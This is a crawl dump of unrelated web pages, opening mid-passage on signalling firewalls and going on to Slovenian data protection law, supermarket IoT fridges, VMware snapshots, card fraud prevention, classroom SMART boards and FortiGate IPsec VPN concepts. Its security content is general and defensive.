The main function of the Signalling Firewall is to protect your network. Using rules to distinguish the messages, the Signalling Firewall is then going to Ignore the message, or Return an Error or Modify the message. The first step is to define those rules to find fraudulent or errant messages. The GSMA specifies category 1,2 and 3 messages, and this is a good place to start, but not the end.
Category 3 messages are a little special. For these messages the Signalling Firewall needs to know some information about the subscriber before determining the validity of the message. Unlike a DEA, the Signalling Firewall can query the HSS, VLR or handset for that subscriber information before it makes a determination.
So the Signalling Firewall is pretty sophisticated on what it can do and it maintains lot of rules and past data. It is the place that brings together rules and protocols, to be one central place for troubleshooting.
During this presentation, I mentioned a couple of other videos. These are the links to them.
The first video will tell you about the Gx, Gy, and S6a interfaces. It explains in more detail what a DRA does with IPCAN sessions and why you might not really need a DRA.
The second video focuses on Diameter Security and how we haven’t really gotten any more secure from our SS7 days.
I hope you enjoy them.
Thank you for watching this video. I hope you have enjoyed it.
Please keep watching this space, as I plan to add more videos soon.
Categorised in: Blog | <urn:uuid:22cc54ce-dd39-48ab-8b6e-94b92bcefbdc> | CC-MAIN-2022-40 | https://www.cellusys.com/2018/09/10/introduction-to-diameter-signalling-controllers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00319.warc.gz | en | 0.93064 | 3,172 | 2.515625 | 3 |
Defining the Constitutional Right of Privacy in Slovenia
Slovenia’s Personal Data Protection Act 2004 is a personal data protection law that was originally passed in 2004. Although Slovenia is a member state within the European Union and is subject to the provisions set out in the EU’s General Data Protection Regulation or GDPR, Slovenia is one of a handful of nations within the EU that has yet to pass a national law for the purposes of implementing the provisions of the EU’s GDPR law into Slovenian law. To this point, Slovenia’s Personal Data Protection Act 2004 has been amended several times, most recently in 2013, in order to provide Slovenian citizens with more updated privacy protections. Moreover, the Personal Data Protection Act 2004 and the EU’s GDPR law represent the primary legal guidelines for which personal data may be collected and processed within Slovenia.
How are data controllers and processors defined?
Under Slovenia’s Personal Data Protection Act 2004, a data controller is defined as “a natural person or legal person or other public or private sector person which alone or jointly with others determines the purposes and means of the processing of personal data or a person provided by statute that also determines the purposes and means of processing.” Alternatively, a data processor is defined as “a natural person or legal person that processes personal data on behalf and for the account of the data controller.” Furthermore, the law defines an individual as “an identified or identifiable natural person to whom personal data relates; an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity, where the method of identification does not incur large costs or disproportionate effort or require a large amount of time.”
What are the requirements?
Data controllers and processors who conduct operations within Slovenia have the following responsibilities and obligations under Slovenia’s Personal Data Protection Act 2004:
- Personal data must be processed in a manner that is consistent with the principles of lawfulness and fairness.
- All personal data that is processed must be adequate in relation to the purposes for which it was collected or further processed.
- The “protection of personal data shall be guaranteed to every individual irrespective of nationality, race, color, religious belief, ethnicity, sex, language, political or other belief, sexual orientation, material standing, birth, education, social position, citizenship, place or type of residence or any other personal circumstance.”
- Sensitive personal data, such as data pertaining to racial or ethnic origin, may only be processed under certain circumstances, such as when an individual provides their consent for the processing of such information.
- All personal data that is processed must be accurate and kept up to date.
- Technical and organizational measures must be taken for the purposes of ensuring the security of personal data that is collected or processed.
What are the rights of Slovenian citizens under Slovenia’s Personal Data Protection Act 2004?
Under Slovenia’s Personal Data Protection Act 2004, Slovenian citizens have the following rights as it concerns data protection:
- The right to be informed.
- The right to access.
- The right erasure.
- The right to rectification.
- The right to object or opt-out.
- The right of restriction.
- The right to judicial protection.
- The right to request a temporary injunction.
In terms of penalties that can be imposed against data controllers and processors who violate any of the rights stated above, Slovenia’s Personal Data Protection Act 2004 is enforced by Slovenia’s National Supervisory Body for Personal Data Protection or the National Supervisory Body for short. As such, the National Supervisory Body has the authority to impose a number of punishments against individuals and organizations who violate the provisions of the law. Such punishments include but are not limited to:
- “A fine from EUR 2.080 to 8.340 shall be imposed for a minor offense on a legal person, sole trader, or individual independently performing an activity, who implements video surveillance in contravention of Article 76.”
- “A fine from EUR 2.080 to 4.170 shall be imposed for a minor offense on a legal person, sole trader, or individual independently performing an activity, if in accordance with this Act he processes personal data for the purposes of direct marketing and does not act in accordance with Articles 72 or 73.”
- “A fine from EUR 4.170 to 12.510 shall be imposed for a minor offense on a legal person, sole trader, or individual independently performing an activity, if he processes personal data in accordance with this Act and fails to ensure the security of personal data (Articles 24 and 25).”
Although Slovenia has yet to enact a national law for the purposes of implementing the provisions of the EU’s GDPR law into Slovenian law, the provisions of the Personal Data Protection Act 2004 and subsequent amendments provide citizens of the country with a comprehensive level of data protection. To this end, the country of Slovenia has a long history of protecting the information of its citizens, as personal data is a constitutionally protected right under the Constitution of the Republic of Slovenia. As such, Slovenia has taken steps to ensure the personal privacy of its citizens, irrespective of the provisions set forth in the EU’s GDPR law. | <urn:uuid:aa161900-9b07-4105-8f9f-1cb58e015b7d> | CC-MAIN-2022-40 | https://caseguard.com/articles/defining-the-constitutional-right-of-privacy-in-slovenia/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00319.warc.gz | en | 0.914425 | 1,117 | 2.890625 | 3 |
This next installment of the Let's be Frank series looks back at how supermarkets rose to the challenges of the pandemic.
In case you hadn’t noticed, there’s been a bit of an increase in demand for food lately. If you wandered down to your local supermarket now – making sure to stay at least 6 feet apart from everyone else, of course – you’re likely to see bare aisles and sparse fridges. But, whilst the strange semi-apocalyptic scenes seen over the past few weeks have alarmed many, it is important to acknowledge that the supermarkets are, in fact, more than prepared to enable and ensure access to food for the duration of the public health situation.
Both the media and government have pointed to the strength of the food supply chain in order to calm nerves, but many have expressed concerns about the resilience of individual stores. While there are logistical ways in which more food can be delivered, spikes in demand, footfall and stock levels put pressure on individual stores and their physical assets. Fridges and freezers are having to work extra hard to maintain optimum temperatures that are being impacted by a combination of extremely high and extremely low levels of stock as well as doors constantly being opened and closed. This unusual activity also makes machine failure a risk.
So, why haven’t we seen fridges breaking down and shops forced to close their doors? Maintained productivity is primarily due to the fact that many retailers now operate ‘smart stores’.
To the uninitiated, the term ‘smart store’ evokes images of futuristic robots whizzing round the aisles collecting what you’ve put on your holographic shopping list. In reality, a smart store is (unfortunately) a little less like a sci-fi movie. Nonetheless, smart store capabilities will be crucial in helping us get through the current period of demand spikes and panic shopping.
Many retailers use a series of connected technologies, under the umbrella term ‘the Internet of Things’. Through these connected systems, retail infrastructure, like fridges and freezers, can be monitored to ensure food is being kept at the right temperature, even with fluctuating levels of stock and the constant opening of doors. This real-time monitoring enables the fridges and freezers to automatically adapt to the optimum temperature required to keep stock fresh and safe to eat.
Machine failure is also mitigated through the use of IoT. By tracking the performance of fridges and freezers in real-time, making sure defrost cycles are normal and temperatures stay at a relative constant, the risk of critical faults developing is massively reduced. This is made possible by linking data from refrigeration performance to engineer work orders. In layman’s terms, effective IoT solutions can identify potential faults as soon as assets show signs of deviating from ‘normal’ behaviour. This data can be fed back into the work order system to help engineers predict when assets are at risk of breaking down and enable them to perform maintenance to not only prevent the ruining of stock, but also reduce the downtime of these extremely critical assets.
Bottom line; by ensuring machines are working as close to 100% efficiency at as close to 100% of the time, we can rely on fridges and freezers to keep stock safe during this unprecedented, volatile time.
Technology like this is used in many supermarkets across the UK. IoT is making sure that food is stored safely whilst reducing the risk of fridges suddenly conking out and ruining all of those elusive chilled foods that everyone is on the lookout for. Images of empty shelves have understandably worried many, and it’s undeniable that the past few weeks have put a lot of pressure on supermarkets, but you can rest assured that retailers have the technology in place to keep cool and keep us fed. | <urn:uuid:2de796d8-dd48-4acf-9b26-43b83a51b3de> | CC-MAIN-2022-40 | https://www.ims-evolve.com/news/lets-be-frank-how-supermarket-fridges-are-keeping-cool-during-the-pandemic.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00319.warc.gz | en | 0.953103 | 780 | 2.546875 | 3 |
This post will talk about how VMware snapshots work, what they should and should not be used for, and provide a demonstration. A snapshot preserves the state and data of a virtual machine from a specific point in time. You can create multiple snapshots to save the virtual machine in different stages of a work process. Snapshots are managed using Snapshot Manager in the vSphere web client, or with PowerCLI. You should not manually alter any of the snapshot files as this may compromise the disk chain, with potential for data loss.
What happens when I take a snapshot?
When you take a snapshot of a virtual machine a number of files are created; a new delta disk (or child disk) is created for each attached disk, in vmdk format. The delta disks follow a naming convention and sequence of vmname-000001.vmdk, vmname-000002.vmdk and so on. These files are stored with the base vmdk by default. Any changes to the virtual machine are written to the delta file(s), preserving the base vmdk file. Think of this delta file as a change log, representing the difference between the current state and the state at the time the snapshot was taken. A .vmsd file is created to store the virtual machine snapshot information defining the relationships between child disks. A .vmsn file and corresponding .vmem file is created if the active state of the virtual machine memory is included in the snapshot. These configuration files are all stored in the virtual machine directory.
When should I use a snapshot?
Use a snapshot as a short term restore point when performing changes such as updating software versions or for testing software or configuration with unknown effects. You can create multiple snapshots of a virtual machine; VMware recommend no more than 32 snapshots in a chain, however best practise for performance is to keep it low, i.e. 2-3 snapshots.
Do not use a snapshot as a backup. Although it provides a restore point a snapshot relies on the base disk(s), without this the snapshot files are worthless. If you need a restore point for more than a few days then consider other options such as traditional backup, or cloning the virtual machine. According to vSphere best practises a single snapshot should not be used for more than 24 – 72 hours. There are a number of factors that determine how long a snapshot can be kept, such as the amount of changed data, and how the application will react to rolling back to a previous point in time. Some disk types and configurations are not supported by snapshots, you can see a full list of limitations here.
What are the risks of using a snapshot?
The more changes that are made within the virtual machine the more data is written to the delta file. This means the delta file grows quickly and in theory can grow as large as the virtual disk itself if the guest operating system writes to every block of the virtual disk. This is why snapshots are strictly a short term solution. Ensure there is sufficient space in the datastore to accommodate snapshots, if the datastore fills up any virtual machines residing in that datastore will be suspended.
How do I take a snaphot?
From the vSphere web client right click the virtual machine to snapshot, select Snapshots, and Take Snapshot. Note that vCenter Server is not a requirement, snapshots are also supported through the local ESXi host web UI.
Enter a name and description for the snapshot. The contents of the virtual machines memory are included in the snapshot by default, retaining the live state of the virtual machine. If you do not capture the memory state, then the virtual machine files require quiescing, otherwise should the virtual machine be reverted to a previous state; then the disks are crash consistent. The exception to this is taking a snapshot of a powered off virtual machine, as it is not possible to capture the memory state, or quiesce the file system.
To view active snapshots locate the virtual machine in the vSphere web client and select the Snapshot tab. Snapshots are listed in order with ‘you are here’ representing the current state, at the end of the snapshot chain.
It is possible to exclude disks by changing the disk mode to independent, covered here. However please use this option with care as it may have other implications. For example if your backup software uses snapshots as part of the backup process then setting independent disks may inadvertently exclude these disks from backups.
How do I revert back to a snapshot?
Select the snapshot you want to revert back to, and click the revert icon in the top left of the snapshot menu. The icon dialog reads ‘revert the VM to the state it was in when the snapshot was taken’.
Review the confirmation message. The virtual machine state and data will be reverted back to the point in time when the selected snapshot was taken. The current state of the virtual machine (changes made since the snapshot was taken) will be lost unless you have taken a further snapshot. Click Yes to continue.
If you have multiple snapshots you will see the ‘you are here’ marker move to the point in the chain you have reverted to. Snapshots taken after this point are still valid and can be reverted to if required. After you have reverted to a snapshot you are happy with you need to save, or commit, the state of the virtual machine. More on this below.
How do I keep the state of the virtual machine?
When you keep the current state of the virtual machine the delta disks are merged with the base disks, committing the changes and the current state of the virtual machine. This is done by using the delete snapshot options in Snapshot Manager.
- Delete All – deletes all snapshots from the virtual machine. This merges the delta disk(s) with the base disk(s) to save, or commit, the virtual machine data and configuration at the current point in time. If you have reverted to a snapshot you still need to delete all snapshots to start writing to the base disk again.
- Delete – deletes individual snapshots from a chain; writing disk changes since the previous snapshot to the parent snapshot delta disk. If only a single snapshot exists then deleting this snapshot is the same as a Delete All for multiple snapshots; the VM state is committed and data is written to the base disk as normal.
Right click the virtual machine in the vSphere web client and select Snapshots, Manage Snapshots. From the All Actions menu select Delete Snapshot to delete the selected snapshot, or Delete All Snapshots. In this example we are deleting all snapshots, so click Yes to confirm.
All snapshots are now removed and the current state of the virtual machine is committed to the base disk. Any changes made from here on in are written to the base disk as normal, unless another snapshot is taken.
What is snapshot consolidation?
Snapshot consolidation is useful if a Delete or Delete All operation fails; for example if a large number of snapshots exist on a virtual machine with high I/O, or if a third party tool such as backup software utilising snapshots is unable to delete redundant delta disks. Using the consolidate option removes any redundant delta disks to improve virtual machine performance and save storage space. This is done by combining the delta disks with the base disk(s) without violating a data dependency, the active state of the virtual machine does not change.
To determine if a virtual machine requires consolidation browse to the vCenter Server, cluster, or host level in the vSphere web client and click the VMs tab. Right click anywhere in the column headers and select Show/Hide Columns. Tick Needs Consolidation and click Ok.
If a virtual machine requires consolidation right click and select Snapshots, Consolidate. There is also a default alarm defined at vCenter level for virtual machine consolidation needed.
From vSphere 6 onwards the snapshot consolidation process was improved. You can read more about the specifics, and testing, in this blog post by Luca Dell’Oca.
The snapshot functions described in this post can also be managed using PowerCLI, this blog post by Anne Jan Elsinga covers the commands you’ll need. | <urn:uuid:ebc890f3-06f1-4ca1-bb7b-0fb8c6b5f12e> | CC-MAIN-2022-40 | https://esxsi.com/2016/12/02/snapshots/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00319.warc.gz | en | 0.903864 | 1,681 | 2.71875 | 3 |
Of the security issues facing banks everywhere, prevention of card fraud has always been a high priority, and is set to grow even further in importance. The level of card fraud has risen significantly over recent years, caused in the main, by the explosion in the number and usage of payment cards and the associated high level of organised card crime activity.
For example, over the past decade, fraud losses on UK-issued plastic cards have risen from Ј96.8m to a staggering Ј402.4m a year. And these figures do not take into account the ‘soft’ costs related to card fraud, such as tarnish to reputation and potential legal costs.
Numerous types of card fraud have been developed over the years and are regularly committed throughout the world. The most prevalent and commonly known type is counterfeit card fraud. However, as new banking channels have opened up, for example internet, phone banking and e-commerce, and the boom in credit card use, crime has migrated to seek any opportunity to attack these new and immature transaction methods.
The losses associated with these attacks has risen drastically over the past couple of years, and counterfeit fraud has now been overtaken as the most costly type of card fraud by a newer method, that of Cardholder-Not-Present (CNP) fraud. In the UK last year, CNP fraud was responsible for losses of Ј116.4m – more than any other type of card fraud.
CNP transactions are performed remotely, when neither the card nor the cardholder is present at the point-of-sale. CNP transactions take many forms such as orders made over the phone or internet, by mail order or fax. In such transactions, retailers are unable to physically check the card or the identity of the cardholder, which makes the user anonymous and able to disguise their true identity. Fraudulently obtained card details are generally used with fabricated personal details to make fraudulent CNP purchases. The card details are normally copied without the cardholder’s knowledge, taken from discarded receipts or obtained by skimming. This means that while the three or four digit Card Security Code on the back of cards can help prevent fraud where card details have been obtained, it does not prevent fraud on cases where the card itself has been stolen.
Ironically, another reason CNP fraud is on the increase is because of the advent of EMV smart cards – a technology that was introduced to tackle counterfeit fraud. The major advantage of smart cards is the increased security they provide. The chip technology uses sophisticated processing techniques to identify authentic cards and make counterfeiting extremely difficult and expensive. Combining this with a PIN is a proven system for combating fraud as it provides the two-factor authentication of ‘something you have’ (the smart card) and ‘something you know’ (the PIN). This makes the probability of fraudulent transactions taking place in an ordinary retail environment extremely low.
By making cardholder present fraud so difficult through the introduction of smart cards, it is predicted that CNP fraud will increase further, along with other forms of fraud such as advanced internet fraud techniques like phishing. At the same time, levels of e-Commerce and internet banking continue to rise and more and more transactions are performed without the physical presence of the user or card.
Two factor authentication is key
Banks are having to face up to the realities of the modern highly connected world, which now provides a vast array of opportunities for banks to interact with customers. It has meant that whether as a consumer or a business, the number of transaction channels is now extremely varied and continuing to grow, yet it is not a scenario that all banks are fully prepared for.
At the moment the maximum level of security available to consumers for e-transactions is user ID and password authentication. However, this is already seen as being inadequate for securing financial transactions. Instead, pioneering banks and credit card providers are turning to the obvious candidate for reducing CNP fraud, the EMV smart card.
The reason that the EMV smart card is not already used within consumer e-transactions is the difficulty in including the card within the transaction process. The solution for this, an unconnected reader, is not new. However, the barrier has always been around cost. In other words, is it more cost effective for the bank to accept low levels of fraud rather than the expense of rolling out millions of unconnected readers to consumers? The continuing rise of CNP fraud is beginning to tilt the argument in favour of the rollout option.
In terms of the technology behind the unconnected smart card readers, it is the introduction of a common standard that is the most important innovation. APACS, in association with MasterCard, released specification standards for unconnected smart card readers which have allowed leading manufacturers to offer products for mass consumption at a commercially viable cost.
The reader provides the user interface to the card and displays a one-time passcode once it has read the smart card and the user has entered his/her PIN. The user then manually types this passcode into the computer at the appropriate prompt. Only the issuing bank can authenticate this one-time passcode. To avoid repeat attacks, the one-time passcode can also be linked to the individual transaction by a more secure, yet still simple, challenge–response process. In that case, should the passcode be intercepted, it is of no use whatsoever beyond that single transaction.
Assuming that consumers will not resist the introduction of unconnected readers, this new system will have an extremely positive effect on fraud and in turn help boost consumer confidence in e-Commerce. However, it is not just internet-based transactions that will benefit. Theoretically, any transaction where the card has to be used, and the cardholder is not present, could use this scheme. For example, if purchasing a good or service over the phone, the user could simply read the one time passcode to the person at the other end who could validate it in the usual way through the payment system. As such the smart card is transformed into a personal security module to validate every financial transaction the user wishes to make.
The security benefits are clear to see. The inclusion of a smart card in every financial transaction will add a crucial second layer of authentication. This two-factor authentication process of something you have as well as something you know should dramatically reduce fraud.
The move towards two-factor authentication for all transactions using smart cards is an important example of a security model that is able to grow organically and embrace and integrate new transaction technologies and channels, as and when required. This kind of flexible, yet secure and dependable system, is key for today’s advancing e-business world and, crucially, is now a commercially possibility. | <urn:uuid:290cc062-be4b-48a3-a095-71f95504d8cd> | CC-MAIN-2022-40 | https://it-observer.com/combating-cardholder-not-present-fraud.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00319.warc.gz | en | 0.954046 | 1,379 | 2.515625 | 3 |
In an age when students have grown up surrounded by technology, it makes sense that teachers would use technology to create interesting lessons. Many teachers have had SMART boards installed in their classrooms and have never looked back. The SMART board makes lessons more interactive and appealing to modern students. You may already have a SMART board and are looking for ways to use it this year, or perhaps you are thinking of getting a SMART board and are wondering what you could do with it. Here are a few fun ways to use a SMART board in the classroom this year!
Use Built-In Activity Templates
Most interactive whiteboard software comes with built-in templates that make it easy for teachers to design their own games to supplement lessons. These templates are definitely not something to overlook! These lessons often cover core subjects and have fun themes that will appeal to students, like beach theme or alien theme!
Let Students Use Their Phones
This is usually a big no-no in class, but giving students some time to use their phones in a productive way is good for the whole class. Letting students use their phones allows even the shy students to participate. Check out SMART Notebook’s LAB for Shout It Out! activities that require students to use their phones to submit a picture or text response. Rather than calling on single students for answers, you can get the whole class to participate!
Teach Math with Visual Manipulatives
SMART Notebook is an extremely useful tool when it comes to using your SMART board. SMART Notebook offers a Math Equation Editor that can transform handwritten equations and formulas into text! Then, when you need a visual aid, you can turn the text into a graph. It’s a huge time-saver!
Get in Touch with FiberPlus
FiberPlus has been providing data communication services for a number of different markets through fiber optics since 1992. What began as a cable installation company for Local Area Networks has grown into a top telecommunications business that can provide the Richmond, VA, Columbus, OH, Pittsburgh, PA, Baltimore, MD, Washington DC, and Northern Virginia areas with a number of different services. These services now include:
- Structured Cabling
- Electronic Security Systems
- Distributed Antenna Systems
- Audio/Visual Services
- Support Services
- Specialty Systems
- Design/Build Services
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at email@example.com, or visit our contact page. | <urn:uuid:9ebce39f-6c89-46fa-8d75-8a6c1a8a566a> | CC-MAIN-2022-40 | https://www.fiberplusinc.com/systems-offered/ways-to-use-your-smart-board-this-year/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00319.warc.gz | en | 0.942718 | 563 | 3.125 | 3 |
IPsec VPN concepts
Virtual Private Network (VPN) technology enables remote users to connect to private computer networks to gain access to their resources in a secure way. For example, an employee traveling or working from home can use a VPN to securely access the office network through the Internet.
Instead of remotely logging on to a private network using an unencrypted and unsecure Internet connection, the use of a VPN ensures that unauthorized parties cannot access the office network and cannot intercept any of the information that is exchanged between the employee and the office. It is also common to use a VPN to connect the private networks of two or more offices.
Fortinet offers VPN capabilities in the FortiGate Unified Threat Management (UTM) appliance and in the FortiClient Endpoint Security suite of applications. A FortiGate unit can be installed on a private network, and FortiClient software can be installed on the user’s computer. It is also possible to use a FortiGate unit to connect to the private network instead of using FortiClient software.
This chapter discusses VPN terms and concepts including: VPN tunnels
Clients, servers, and peers
Phase 1 and Phase 2 settings
IKE and IPsec packet processing
The data path between a user’s computer and a private network through a VPN is referred to as a tunnel. Like a physical tunnel, the data path is accessible only at both ends. In the telecommuting scenario, the tunnel runs between the FortiClient application on the user’s PC, or a FortiGate unit or other network device and the FortiGate unit on the office private network.
Encapsulation makes this possible. IPsec packets pass from one end of the tunnel to the other and contain data packets that are exchanged between the local user and the remote private network. Encryption of the data packets ensures that any third-party who intercepts the IPsec packets can not access the data.
Encoded data going through a VPN tunnel
You can create a VPN tunnel between:
- A PC equipped with the FortiClient application and a FortiGate unit
- Two FortiGate units
- Third-party VPN software and a FortiGate unit
For more information on third-party VPN software, refer to the Fortinet Knowledge Base for more information.
Several tunnel templates are available in the IPsec VPN Wizard that cover a variety of different types of IPsec VPN. A list of these templates appear on the first page of the Wizard, located at VPN > IPsec Wizard. The tunnel template list follows.
IPsec VPN Wizard options
VPN Type Remote Device Type NAT Options Description
Site to Site FortiGate l No NAT between sites
- This site is behind NAT
- The remote site is behind NAT
Static tunnel between this FortiGate and a remote FortiGate.
- No NAT between sites
- This site is behind NAT
- The remote site is behind NAT
Static tunnel between this FortiGate and a remote Cisco firewall.
|VPN Type Remote Device Type NAT Options Description|
FortiClient VPN for OS X, N/A On-demand tunnel for
Windows, and Android users using the FortiCli- ent software.
iOS Native N/A On-demand tunnel for iPhone/iPad users using the native iOS IPsec cli- ent.
Android Native N/A On-demand tunnel for Android users using the native L2TP/IPsec client.
Windows Native N/A On-demand tunnel for Android users using the native L2TP/IPsec client.
Cisco Client N/A On-demand tunnel for users using the Cisco IPsec client.
N/A N/A No Template.
VPN tunnel list
Once you create an IPsec VPN tunnel, it appears in the VPN tunnel list at VPN > IPsec Tunnels. By default, the tunnel list indicates the name of the tunnel, its interface binding, the tunnel template used, and the tunnel status. If you right-click on the table header row, you can include columns for comments, IKE version, mode (aggressive vs main), phase 2 proposals, and reference number. The tunnel list page also includes the option to create a new tunnel, as well as the options to edit or delete a highlighted tunnel.
A gateway is a router that connects the local network to other networks. The default gateway setting in your computer’s TCP/IP properties specifies the gateway for your local network.
A VPN gateway functions as one end of a VPN tunnel. It receives incoming IPsec packets, decrypts the encapsulated data packets and passes the data packets to the local network. Also, it encrypts data packets destined for the other end of the VPN tunnel, encapsulates them, and sends the IPsec packets to the other VPN gateway. The VPN gateway is a FortiGate unit because the private network behind it is protected, ensuring the security of the unencrypted VPN data. The gateway can also be FortiClient software running on a PC since the unencrypted data is secure on the PC.
The IP address of a VPN gateway is usually the IP address of the network interface that connects to the Internet. Optionally, you can define a secondary IP address for the interface and use that address as the local VPN gateway address. The benefit of doing this is that your existing setup is not affected by the VPN settings.
The following diagram shows a VPN connection between two private networks with FortiGate units acting as the VPN gateways. This configuration is commonly referred to as Gateway-to-Gateway IPsec VPN.
VPN tunnel between two private networks
Although the IPsec traffic may actually pass through many Internet routers, you can visualize the VPN tunnel as a simple secure connection between the two FortiGate units.
Users on the two private networks do not need to be aware of the VPN tunnel. The applications on their computers generate packets with the appropriate source and destination addresses, as they normally do. The FortiGate units manage all the details of encrypting, encapsulating, and sending the packets to the remote VPN gateway.
The data is encapsulated in IPsec packets only in the VPN tunnel between the two VPN gateways. Between the user’s computer and the gateway, the data is on the secure private network and it is in regular IP packets.
For example User1 on the Site A network, at IP address 10.10.1.7, sends packets with destination IP address 192.168.10.8, the address of User2 on the Site B network. The Site A FortiGate unit is configured to send packets with destinations on the 192.168.10.0 network through the VPN, encrypted and encapsulated. Similarly, the Site B FortiGate unit is configured to send packets with destinations on the 10.10.1.0 network through the VPN tunnel to the Site A VPN gateway.
In the site-to-site, or gateway-to-gateway VPN shown below, the FortiGate units have static (fixed) IP addresses and either unit can initiate communication.
You can also create a VPN tunnel between an individual PC running FortiClient and a FortiGate unit, as shown below. This is commonly referred to as Client-to-Gateway IPsec VPN.
VPN tunnel between a FortiClient PC and a FortiGate unit
On the PC, the FortiClient application acts as the local VPN gateway. Packets destined for the office network are encrypted, encapsulated into IPsec packets, and sent through the VPN tunnel to the FortiGate unit. Packets for other destinations are routed to the Internet as usual. IPsec packets arriving through the tunnel are decrypted to recover the original IP packets.
Clients, servers, and peers
A FortiGate unit in a VPN can have one of the following roles:
- Server — responds to a request to establish a VPN tunnel.
- Client — contacts a remote VPN gateway and requests a VPN tunnel.
- Peer — brings up a VPN tunnel or responds to a request to do so.
The site-to-site VPN shown above is a peer-to-peer relationship. Either FortiGate unit VPN gateway can establish the tunnel and initiate communications. The FortiClient-to-FortiGate VPN shown below is a client-server relationship. The FortiGate unit establishes a tunnel when the FortiClient PC requests one.
A FortiGate unit cannot be a VPN server if it has a dynamically-assigned IP address. VPN clients need to be configured with a static IP address for the server. A FortiGate unit acts as a server only when the remote VPN gateway has a dynamic IP address or is a client-only device or application, such as FortiClient.
As a VPN server, a FortiGate unit can also offer automatic configuration for FortiClient PCs. The user needs to know only the IP address of the FortiGate VPN server and a valid user name/password. FortiClient downloads the VPN configuration settings from the FortiGate VPN server. For information about configuring a FortiGate unit as a VPN server, see the FortiClient Administration Guide.
Encryption mathematically transforms data to appear as meaningless random numbers. The original data is called plaintext and the encrypted data is called ciphertext. The opposite process, called decryption, performs the inverse operation to recover the original plaintext from the ciphertext.
The process by which the plaintext is transformed to ciphertext and back again is called an algorithm. All algorithms use a small piece of information, a key, in the arithmetic process of converted plaintext to ciphertext, or vice-versa. IPsec uses symmetrical algorithms, in which the same key is used to both encrypt and decrypt the data. The security of an encryption algorithm is determined by the length of the key that it uses. FortiGate IPsec VPNs offer the following encryption algorithms, in descending order of security:
AES–GCM Galois/Counter Mode (GCM), a block cipher mode of operation providing both confidentiality and data origin authentication.
AES256 A 128-bit block algorithm that uses a 256-bit key.
AES192 A 128-bit block algorithm that uses a 192-bit key.
AES128 A 128-bit block algorithm that uses a 128-bit key.
3DES Triple-DES, in which plain text is DES-encrypted three times by three keys.
DES Digital Encryption Standard, a 64-bit block algorithm that uses a 56-bit key
The default encryption algorithms provided on FortiGate units make recovery of encrypted data almost impossible without the proper encryption keys.
There is a human factor in the security of encryption. The key must be kept secret, known only to the sender and receiver of the messages. Also, the key must not be something that unauthorized parties might easily guess, such as the sender’s name, birthday or simple sequence such as 123456.
The FortiGate sets an IPsec tunnel Maximum Transmission Unit (MTU) of 1436 for 3DES/SHA1 and an MTU of 1412 for AES128/SHA1, as seen with diag vpn tunnel list. This indicates that the FortiGate allocates 64 bytes of overhead for 3DES/SHA1 and 88 bytes for AES128/SHA1, which is the difference if you subtract this MTU from a typical ethernet MTU of 1500 bytes.
During the encryption process, AES/DES operates using a specific size of data which is block size. If data is smaller than that, it will be padded for the operation. MD5/SHA-1 HMAC also operates using a specific block size.
The following table describes the potential maximum overhead for each IPsec encryption:
IPsec Transform Set IPsec Overhead (Max. bytes)
ESP–AES (256, 192, or 128),ESP-SHA-HMAC, or MD5 73
ESP–AES (256, 192, or 128) 61
|IPsec Transform Set||IPsec Overhead (Max. bytes)|
ESP-(DES or 3DES), ESP-SHA-HMAC, or MD5
ESP–Null, ESP-SHA-HMAC, or MD5
AH–SHA–HMAC or MD5
To protect data via encryption, a VPN must ensure that only authorized users can access the private network. You must use either a preshared key on both VPN gateways or RSA X.509 security certificates. The examples in this guide use only preshared key authentication. Refer to the Fortinet Knowledge Base for articles on RSA X.509 security certificates.
A preshared key contains at least six random alphanumeric characters. Users of the VPN must obtain the preshared key from the person who manages the VPN server and add the preshared key to their VPN client configuration.
Although it looks like a password, the preshared key, also known as a shared secret, is never sent by either gateway. The preshared key is used in the calculations at each end that generate the encryption keys. As soon as the VPN peers attempt to exchange encrypted data, preshared keys that do not match will cause the process to fail.
To increase security, you can require additional means of authentication from users, such as:
- An identifier, called a peer ID or a local ID.
- Extended authentication (XAUTH) which imposes an additional user name/password requirement.
A Local ID is an alphanumeric value assigned in the Phase 1 configuration. The Local ID of a peer is called a Peer ID.
In FortiOS 5.2, new authentication methods have been implemented for IKE: ECDSA-256, ECDSA-384, and ECDSA-521. However, AES-XCBC is not supported.
Phase 1 and Phase 2 settings
A VPN tunnel is established in two phases: Phase 1 and Phase 2. Several parameters determine how this is done. Except for IP addresses, the settings simply need to match at both VPN gateways. There are defaults that are appropriate for most cases.
FortiClient distinguishes between Phase 1 and Phase 2 only in the VPN Advanced settings and uses different terms. Phase 1 is called the IKE Policy. Phase 2 is called the IPsec Policy.
In Phase 1, the two VPN gateways exchange information about the encryption algorithms that they support and then establish a temporary secure connection to exchange authentication information.
When you configure your FortiGate unit or FortiClient application, you must specify the following settings for Phase 1:
Remote gateway The remote VPN gateway’s address.
FortiGate units also have the option of operating only as a server by select- ing the “Dialup User” option.
Preshared key This must be the same at both ends. It is used to encrypt Phase 1 authen- tication information.
Local interface The network interface that connects to the other VPN gateway. This applies on a FortiGate unit only.
All other Phase 1 settings have default values. These settings mainly configure the types of encryption to be used. The default settings on FortiGate units and in the FortiClient application are compatible. The examples in this guide use these defaults.
For more detailed information about Phase 1 settings, see Phase 1 parameters on page 1624.
Similar to the Phase 1 process, the two VPN gateways exchange information about the encryption algorithms that they support for Phase 2. You may choose different encryption for Phase 1 and Phase 2. If both gateways have at least one encryption algorithm in common, a VPN tunnel can be established. Keep in mind that more algorithms each phase does not share with the other gateway, the longer negotiations will take. In extreme cases this may cause timeouts during negotiations.
